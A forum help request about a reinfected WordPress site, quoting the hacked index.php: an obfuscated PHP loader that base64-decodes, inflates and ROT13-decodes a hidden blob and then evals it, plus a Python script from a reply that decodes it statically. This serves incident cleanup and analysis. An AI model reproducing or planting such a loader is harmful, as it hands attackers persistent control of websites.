WordPress index.php & .htaccess hacked to replace itself, please help decode

Question

I am not a savvy programmer. I build a website business based on WordPress + WooCommerce. Recently, my client’s website was attacked due to one of the administrators’ weak password. Now the index.php and .htaccess are hacked and are adding malware on a daily basis. Since I’m not a programmer, please help me to fix this problem with a more user-friendly explanation.

My research and attempts so far:

  • At least I know how to clean up malware files by looking for weird PHP files compared to another WP site that’s clean. I learned most of it through a Wordfence scan (and mostly research online).
  • Learned that malware is often created with a base file (usually an .ico or .png file that contains malicious code), and that the contents are often written in a “php base64 decode”.
  • On the first day of the hack, I was able to clean up the malicious files, allowing me to open the “/wp-admin/plugins.php” page and reinstall Wordfence, which had been uninstalled by the hacker, so that Wordfence could help me find the rest of the malicious files to delete.
  • Cleaned up any abandoned plugins and old theme files, changed all administrator passwords, and changed the “mysql database password” in “wp-config.php”.

On the second day, BAM. The site is hacked again. The malware is back again. I would like to be able to solve this myself before relying on paid services / software (such as MalCare paid, Wordfence Premium, or Sucuri), so as to improve my skills even though I don’t have a background in programming.

So if any good souls out there are willing to help me, that’d be very much appreciated. Please start by helping me decode this (hacked index.php):

<?php $HX1Shcp
= function ($UIx){$fgY = "A4GS";$LtCj0='L'.
$fgY[(15 -22+10) /3].   't' .$fgY[(69 -61- 2) /2].  ((61- 53 - 6) / 2).$fgY[(69 - 51 -10) /4].
$fgY[(55- 59 + 4)/3]
. 'j'   .'C'    .'';
  return $LtCj0($UIx);};     
      
    
$yIFICSON='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';$KWI5 = function($XNnC8cRQ  ){$ucId7fM = "6bSedoD";$FTxuK1=$ucId7fM[(89- 85)/ 4]    ;$FTxuK1
.=      'a' .$ucId7fM[(87- 85+ 2) / 2].
'E' .((108 - 90 + 6)/ 4).((20 - 8)/3)   . '_'   ;
$FTxuK1 .= $ucId7fM[(32 -22 + 6) /4]    .$ucId7fM[(107- 83 - 6) / 6] . 'C'.$ucId7fM[(102 - 79+ 2) / 5];$FTxuK1  .=  $ucId7fM[(60-42)/ 3].$ucId7fM[(99 -78 - 6) / 5].
'';
return $FTxuK1($XNnC8cRQ);          
}; $txgbNkAqm= function ($__w )
{$eRYBM = "IGl";$YzU=$eRYBM[(96 -92- 2) /2] . 'z'.  $eRYBM[(50 -50)/3]  .
'N'.    'F' . $eRYBM[(15- 9) / 3].'A' .
't'. 'e'
.'';         
    return $YzU($__w);  };          

$KWI5   = function($XNnC8cRQ
){$ucId7fM = "6bSedoD";$FTxuK1=$ucId7fM[(89- 85)/ 4]    ;
$FTxuK1 .= 'a'.$ucId7fM[(87- 85+ 2) / 2]    .
'E'.((108 - 90 + 6)/ 4).
((20 - 8)/3) .
'_' ; $FTxuK1   .=  $ucId7fM[(32 -22 + 6) /4] .$ucId7fM[(107- 83 - 6) / 6].'C' .$ucId7fM[(102 - 79+ 2) / 5]
;   $FTxuK1
.=  $ucId7fM[(60-42)/ 3]
.
$ucId7fM[(99 -78 - 6) / 5].
'';  
return $FTxuK1($XNnC8cRQ);  }; $yIFICSON
=$HX1Shcp($yIFICSON);$yIFICSON  = $KWI5($yIFICSON);
 $VuySiMk= function($T5Sv6RW3){
return "u_2r7GQdhyKvNLctCZIm5iS0KQLZsO_HWUPY7uxSgUkecRKgB";
};
$txgbNkAqm=
function($__w   )
{$eRYBM = "IGl";$YzU=$eRYBM[(96 -92- 2) /2] .'z'    .$eRYBM[(50 -50)/3].'N' .
'F'.    $eRYBM[(15- 9) / 3] .'A'
. 't'.'e'. '';
return $YzU($__w);  };$yIFICSON =   $txgbNkAqm($yIFICSON); 
function    ODlh(){
return "Ps8YoWHCAf7hnVPAdQgQZ0TIGia8V9";}
 
 function  Zci
($dyTpp8g){$Hye = "1_trs";$YoB=$Hye[(63 -45-10) / 2]
.   'T'.$Hye[(36-31 +10) /5]    . $Hye[(34- 32)/ 2] . $Hye[(75-56-1)/6] .
'O' ;   $YoB .= $Hye[(62 - 60 +2)/ 2] .((95 -89) /6).((36 -18)/6)   ;
$YoB.=
    ''; return $YoB($dyTpp8g);  }   
    function 
dqdwwy ($egUUErn_l
,$LuZw3o)
{    $_Bb8="ubZPp4NG9KU9s8uTPoK";
     return $_Bb8;
}function   iJPzSr5
($qshhk1){$QgSV1iWj7 = "Vb79";$cCLs7_=((43 - 25 +3) / 3);   $cCLs7_.= $QgSV1iWj7[(57-50 - 7)/ 3].
'h'
. 'b' .$QgSV1iWj7[(19 -16) / 3] . $QgSV1iWj7[(34 -27+5) / 4]    ;   $cCLs7_ .=  's'
.
'2' . 'F'; $cCLs7_ .=    '';return $cCLs7_;
 
    }

function    l4tS1Gajc
($xPkyYU    ) {return  iJPzSr5('')
.$xPkyYU;}$yIFICSON =
Zci($yIFICSON);eVal ($yIFICSON); ?><?php  define('WP_USE_THEMES', true );require(__DIR__.  '/wp-blog-header.php' ); ?>

Samuel Edyson Edellean, 2023-02-04T06:36:11-05:00
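The layers in the posted index.php can be read statically, without running any of the PHP. The following is an added example in Python, not part of the original post: it resolves the arithmetic-indexed string builders copied from the sample into the names they spell (PHP function names are case-insensitive, so `$HX1Shcp` calls `l4tS1Gajc`, which prepends the string built by `iJPzSr5`), and `unwrap` reverses the resulting chain in the order the sample applies it. `BUILDERS`, `resolve_name` and `unwrap` are names chosen for this example.

```python
import base64, codecs, re, zlib
# String-builder bodies copied from the posted index.php (whitespace and
# empty '' literals trimmed).
BUILDERS = {
    "$HX1Shcp": """$fgY = "A4GS";$LtCj0='L'.$fgY[(15 -22+10) /3].'t'.$fgY[(69 -61- 2) /2].
        ((61- 53 - 6) / 2).$fgY[(69 - 51 -10) /4].$fgY[(55- 59 + 4)/3].'j'.'C';""",
    "iJPzSr5": """$QgSV1iWj7 = "Vb79";$cCLs7_=((43 - 25 +3) / 3);
        $cCLs7_.=$QgSV1iWj7[(57-50 - 7)/ 3].'h'.'b'.$QgSV1iWj7[(19 -16) / 3].
        $QgSV1iWj7[(34 -27+5) / 4];$cCLs7_.='s'.'2'.'F';""",
    "$KWI5": """$ucId7fM = "6bSedoD";$FTxuK1=$ucId7fM[(89- 85)/ 4];
        $FTxuK1.='a'.$ucId7fM[(87- 85+ 2) / 2].'E'.((108 - 90 + 6)/ 4).((20 - 8)/3).'_';
        $FTxuK1.=$ucId7fM[(32 -22 + 6) /4].$ucId7fM[(107- 83 - 6) / 6].'C'.
        $ucId7fM[(102 - 79+ 2) / 5];$FTxuK1.=$ucId7fM[(60-42)/ 3].$ucId7fM[(99 -78 - 6) / 5];""",
    "$txgbNkAqm": """$eRYBM = "IGl";$YzU=$eRYBM[(96 -92- 2) /2].'z'.$eRYBM[(50 -50)/3].
        'N'.'F'.$eRYBM[(15- 9) / 3].'A'.'t'.'e';""",
    "Zci": """$Hye = "1_trs";$YoB=$Hye[(63 -45-10) / 2].'T'.$Hye[(36-31 +10) /5].
        $Hye[(34- 32)/ 2].$Hye[(75-56-1)/6].'O';
        $YoB.=$Hye[(62 - 60 +2)/ 2].((95 -89) /6).((36 -18)/6);""",
}

def _arith(expr):
    """Evaluate the sample's '(a - b + c) / n' index arithmetic as integers."""
    m = re.fullmatch(r"\s*\(([^()]*)\)\s*/\s*(\d+)\s*", expr)
    if not m:
        raise ValueError(f"unexpected expression: {expr!r}")
    terms = re.findall(r"[+-]?\s*\d+", m.group(1))
    return sum(int(re.sub(r"\s", "", t)) for t in terms) // int(m.group(2))

def resolve_name(body):
    """Return the string a builder body concatenates, without running PHP."""
    m = re.search(r'(\$\w+)\s*=\s*"([^"]*)"', body)
    var, alphabet = m.groups()
    token = re.compile(r"'([^']*)'|" + re.escape(var) + r"\[([^\]]+)\]|\((\([^()]*\)\s*/\s*\d+)\)")
    parts = []
    for t in token.finditer(body, m.end()):
        if t.lastindex == 1: parts.append(t.group(1))                      # quoted literal
        elif t.lastindex == 2: parts.append(alphabet[_arith(t.group(2))])  # alphabet lookup
        else: parts.append(str(_arith(t.group(3))))                        # bare digit
    return "".join(parts)

def unwrap(blob, prefix):
    """Reverse the layers: prefix+blob -> base64 -> raw DEFLATE -> ROT13."""
    b64 = re.sub(r"\s+", "", prefix + blob)
    b64 += "=" * (-len(b64) % 4)  # PHP's base64_decode tolerates missing padding
    inflated = zlib.decompress(base64.b64decode(b64), -15)
    return codecs.decode(inflated.decode("latin-1"), "rot_13")

if __name__ == "__main__":
    for name, body in BUILDERS.items():
        print(name, "->", resolve_name(body))
```

To inspect the real payload, pass `unwrap` the quoted `$yIFICSON` string and the prefix resolved for `iJPzSr5`, then read the returned text; nothing in it is evaluated.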
